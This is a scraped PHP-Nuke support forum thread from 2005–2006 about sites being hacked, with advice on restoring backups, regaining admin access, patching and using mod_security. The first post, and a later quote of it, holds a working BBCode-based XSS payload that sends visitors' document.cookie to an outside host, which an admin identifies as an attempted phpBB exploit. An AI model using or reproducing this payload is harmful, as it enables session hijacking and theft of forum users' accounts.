You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 400 guest(s) and 15 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Nuke Cops :: View topic - (read first) If your site hacked [ ]
 Forum FAQ  •  Search  •   •  Memberlist  •  Usergroups   •  Register  •  Profile •    •  Log in to check your private messages  •  Log in

 
Post new topic  Reply to topicprinter-friendly view
View previous topic Log in to check your private messages View next topic
Author Message
jook
Nuke Cadet
Nuke Cadet


Joined: Jul 23, 2005
Posts: 1


PostPosted: Sat Jul 23, 2005 11:50 am Reply with quoteBack to top

Intresting...
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://speed-skating.net/.so/foo.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'
Find all posts by jookView user's profileSend private message
marcus4309
Nuke Soldier
Nuke Soldier


Joined: Jul 22, 2005
Posts: 10


PostPosted: Sun Jul 24, 2005 8:23 am Reply with quoteBack to top

Evaders99 wrote:
You'll have to install the latest BBToNuke and Patched files, so there's really nothing you can do. Install them, and then redo your custom modifications.

A good program like Winmerge will help comparing files and getting those changes done.


theres really no way of patching without losing everything I've done? There's gotta be Sad
Find all posts by marcus4309View user's profileSend private message
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12482


PostPosted: Mon Jul 25, 2005 4:24 am Reply with quoteBack to top

There's no automatic approach to this unfortunately. There are too many changes to the files, in probably 99% of the time - it would be easier to redo your modifications than try to do all the patched changes manually.

Changed logs for the Patched files are available at http://www.nukefixes.com , however they may not be complete depending on the file version you are using

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
Luciel
Sergeant
Sergeant


Joined: Aug 28, 2004
Posts: 119


PostPosted: Mon Jul 25, 2005 6:25 am Reply with quoteBack to top

For some reason my pass didnt work anymore, although there were no signs of being hacked, so i cleared the admin accounts from the authors table, and went to admin.php however i have it setup to popup to come up (sentinel) and it wont recognise there is no account, therefor i cannot get into admin :S what can i do?
Find all posts by LucielView user's profileSend private message
Luciel
Sergeant
Sergeant


Joined: Aug 28, 2004
Posts: 119


PostPosted: Mon Jul 25, 2005 10:36 am Reply with quoteBack to top

anyone? please?
Find all posts by LucielView user's profileSend private message
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12482


PostPosted: Mon Jul 25, 2005 7:46 pm Reply with quoteBack to top

You may need to disable Sentinel

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
Luciel
Sergeant
Sergeant


Joined: Aug 28, 2004
Posts: 119


PostPosted: Tue Jul 26, 2005 6:54 am Reply with quoteBack to top

Ok what i did was point the htaccess to a non existant file that way the sentinel login popup wouldnt come up, i made a new admin, activated sentinel and everything is just fine
Find all posts by LucielView user's profileSend private message
Slackervaara
Captain
Captain


Joined: Sep 13, 2003
Posts: 355


PostPosted: Thu Aug 04, 2005 5:26 am Reply with quoteBack to top

ExtremeGamer wrote:
Not only was my siter hacked. I cannot change the language as you will see here.

http://www.impa-gscrb.org/html

EG Very Happy


I thought a hacker changed the language on my site too, but it was caused by the gallery Coppermine. When I changed Coppermine to my original language the language of PHP-Nuke changed too and the site worked perfectly normal again.
Find all posts by SlackervaaraView user's profileSend private message
paperclips
Nuke Cadet
Nuke Cadet


Joined: Nov 01, 2005
Posts: 1


PostPosted: Tue Nov 01, 2005 7:27 pm Reply with quoteBack to top

Hello,

the reason why I'm here is quite strange. recently, in my stats I got somes visitors through this page and I don't know why until today when I make displayed the source code of the page and find the adress of my site.

why, when I quote jook, I can see the adress of my website??

here is what we saw when wuoting is message saying interesting. My website is speed-skating.net

Code:
[quote="jook"]Intresting...
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://speed-skating.net/.so/foo.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color][/quote]


thanks
Find all posts by paperclipsView user's profileSend private message
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12482


PostPosted: Wed Nov 02, 2005 3:20 pm Reply with quoteBack to top

It is a hacker trying to exploit a vulnerability in phpBB. If you are using 2.0.17 of the forums, you should not be vulnerable to this.

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
Gumbercules
Nuke Cadet
Nuke Cadet


Joined: Nov 17, 2005
Posts: 3


PostPosted: Thu Nov 17, 2005 5:32 am Reply with quoteBack to top

Hi All,

Instead of relying on 3rd party add-ons to protect you in phpNuke why don't you take it on from a different angle? phpNuke and phpBB (which is the real attack vector of most attacks) are the real problem here because they're 3rd party and you don't really know what's going on. If you add yet another 3rd party "plug in" to phpNuke, you're still relying on someone else and a known-to-be-buggy infrastructure for your protection. It's so disappointing to see comments like "I no longer use phpNuke 7.5. I now use the more secure 7.6 platinum..." Which is only secure until the next exploit, and so on and so on... Here's a thought, if they got to 7.5 with holes in it, what makes you think 7.6 is the exact first version with no problems at all? Especially considering you can get 7.9 already...

Instead, if you have the ability, install mod_security for Apache. This allows you to pre-filter URLs before Apache even handles them, so you can drop anything that's not playing by the rules. http://www.modsecurity.org/download/index.html.

I've just put a long rant about this in the r0nin thread http://www.nukecops.com/postx44102-0-15.html so I won't repeat it (but if you have the time, check it out, it's one of the most powerful security mods available for Apache) but I will make one point again.

If you've been hacked, there is NO QUICK FIX. You can't "undo" what they did. ESPECIALLY if you have to ask people how. How do you know what else they did? Did they install and execute a shell? If they did, what did they do with it? Only one option: Format+Reinstall. There is no other way to get your machine back.
Find all posts by GumberculesView user's profileSend private message
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12482


PostPosted: Thu Nov 17, 2005 1:08 pm Reply with quoteBack to top

There are levels of hacking. Mostly, its script kiddies that will deface your site with their junk. In that case, they won't have the skills to do any real damage to your server.

You are right that server compromised by executing scripts should be reinstalled.

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
vigan
Private
Private


Joined: Nov 17, 2005
Posts: 46


PostPosted: Tue Nov 29, 2005 7:29 am Reply with quoteBack to top

My website(nuke) got hacked. I have the backup from admin panel but i don't know how to use it.Nuke version was 7.6. The hackers deleted blocks, and I can not turn them back
How could they hack it, where is the bug or hole ?
What shall I do ?,and my i my nuke has renane to another place,how can i turn it to the before place?
Find all posts by viganView user's profileSend private message
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12482


PostPosted: Tue Nov 29, 2005 1:24 pm Reply with quoteBack to top

If you have a database backup, you can use phpMyAdmin to restore those tables. Delete your old ones and insert the ones from the backup

Next, load a backup of your files.. no telling what they could have installed on your site. Then upgrade your software - use the latest Patched files for your version, get all your modules upgraded, install a good security addon.

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
dleblanc
Nuke Cadet
Nuke Cadet


Joined: Feb 20, 2006
Posts: 4


PostPosted: Mon Feb 20, 2006 6:22 pm Reply with quoteBack to top

JadeFist wrote:
I followed the instructions in the first post of this thread. Why won't it create a new admin account? I can't see the security code graphic. Is there something I'm missing in the steps of that post?


Anyone with an answer to this, anyone. I mean it nice having the time off becuase I can't access the CP, but I will have to sometime.
Find all posts by dleblancView user's profileSend private message
Display posts from previous:      
Post new topic  Reply to topicprinter-friendly view
View previous topic Log in to check your private messages View next topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::
Powered by TOGETHER TEAM srl ITALY http://www.togetherteam.it - DONDELEO E-COMMERCE http://www.DonDeLeo.com - TUTTISU E-COMMERCE http://www.tuttisu.it
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.292 Seconds - 354 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::